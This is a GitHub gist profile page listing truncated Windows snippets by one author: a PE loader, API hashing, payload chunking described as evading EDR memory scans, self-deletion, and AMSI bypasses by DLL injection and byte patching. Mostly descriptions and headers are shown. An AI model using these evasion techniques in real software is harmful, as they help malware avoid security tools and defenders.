Skip to content

Instantly share code, notes, and snippets.

View wizardy0ga's full-sized avatar
😄

WizardYoga wizardy0ga

😄
View GitHub Profile
@wizardy0ga
wizardy0ga / print.c
Created August 23, 2025 19:31
A simple macro for printing to console on win32 applications w/o a c runtime. Can also be used for standard win32 apps
// CRT independant printing function
# define print(msg, ...) \
if (1) { \
LPSTR Buf = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024); \
if (Buf) { \
int len = wsprintfA(Buf, msg "\n", __func__, __VA_ARGS__); \
WriteConsoleA(GetStdHandle(STD_OUTPUT_HANDLE), Buf, len, 0, 0); \
HeapFree(GetProcessHeap(), 0x00, Buf); \
} \
}
@wizardy0ga
wizardy0ga / LoadPe.c
Created June 14, 2025 04:11
Load a portable executable in the local process & execute it
/*
@brief
Load a PE in memory and execute it in the address space of this process
@author
wizardy0ga
@usage:
LoadPe.exe <path to exe>
@wizardy0ga
wizardy0ga / Win32Hash.h
Created February 14, 2025 13:57
A header file library template to support function resolution via API hashing on windows
#pragma once
#include <windows.h>
#include <stdio.h>
#define SEED_HASH 8888
#define KERNEL32_HASH 0xA52DE12A
#define LOAD_LIBRARY_HASH 0xF4DAB6A4
typedef struct _UNICODE_STRING_
{
@wizardy0ga
wizardy0ga / NtChunkAllocate.C
Created December 3, 2024 00:58
Writing a payload into memory via chunking within the NT API
/*
Description:
Copies a payload into memory using a chunking method using NTAPI calls. This assists with breaking up memory scanning routines by EDRs.
A reserved / readonly page will be left at the top of the allocation. Each page below this memory page will contain the payload.
| Page 1 | 4096 bytes | Reserved | R
| Page 2 | 4096 bytes | Commited | RX
| Page 3 | 4096 bytes | Commited | RX
| Page ... | 4096 bytes | Commited | RX
@wizardy0ga
wizardy0ga / ChunkToMemory.c
Created December 2, 2024 14:03
Copying data into memory through chunking
/*
Description:
Copies a payload into memory using a chunking method. This assists with breaking up memory scanning routines by EDRs.
A reserved / readonly page will be left at the top of the allocation. Each page below this memory page will contain the payload.
| Page 1 | 4096 bytes | Reserved | R
| Page 2 | 4096 bytes | Commited | RX
| Page 3 | 4096 bytes | Commited | RX
| Page ... | 4096 bytes | Commited | RX
@wizardy0ga
wizardy0ga / DrmProtection.C
Last active December 25, 2024 04:38
A PoC DRM protected program for windows
/*
Description:
Program is a PoC DRM implementation. The program will only execute on the windows device that it first executed
on. If it's copied to another device, it will delete itself on execution.
A signature is kept in the rdata section of the binary. On fisrt exection, if the signature is the default signature,
DRM will be initialized. This process consists of hashing the BIOS's UUID, & replacing the default signature with this
hash. When the program executes again, it will check the BIOS's UUID hash against the signature stored in the
.rdata section. If the hash doesn't match, the program deletes itself.
@wizardy0ga
wizardy0ga / SelfDeleteWin32.c
Last active April 11, 2025 02:03
Force a windows executable to delete itself by modifying the default data stream name & removing the file via SetFileInformationByHandle API
#include <windows.h>
#include <winternl.h>
#define STREAM_NAME L":XanWudS"
BOOL SelfDelete()
{
HANDLE hFile = INVALID_HANDLE_VALUE;
PWSTR szImageName = NULL;
FILE_DISPOSITION_INFO DisposalInfo = { .DeleteFile = TRUE };
@wizardy0ga
wizardy0ga / AmsiBypassDll.c
Last active November 3, 2024 01:10
Demonstration of an AMSI bypass via DLL injection into a powershell process
#include "pch.h"
#include <Windows.h>
#include <stdio.h>
#define RET 0xC3
#define INT3 0xCC
#define JE 0x74
#define JNE 0x75
#define MOV 0xB8
@wizardy0ga
wizardy0ga / AmsiBypassViaBytePatch.c
Last active November 22, 2024 20:15
A bypass for AMSI using byte patching
/*
Description:
Bypasses AMSI by patching the functions in memory with single byte patches. Some amsi functions
will validate parameters & jump to a failure routine if the validation failes. By flipping this check,
the functions can be forced to fail which blind the anti-malware scan interface.
Author:
wizardy0ga
Date:
@wizardy0ga
wizardy0ga / GetProcAddress.c
Last active December 10, 2024 02:17
Custom GetProcAddress function. Avoid listing 'GetProcAddress' in the address table.
/*
Description:
A simplified version of GetProcAddress. Posting here for reference later.
Author:
WizardY0ga
Mitre:
T1027.007 - Obfuscated Files or Information: Dynamic API Resolution
Date:
October 2024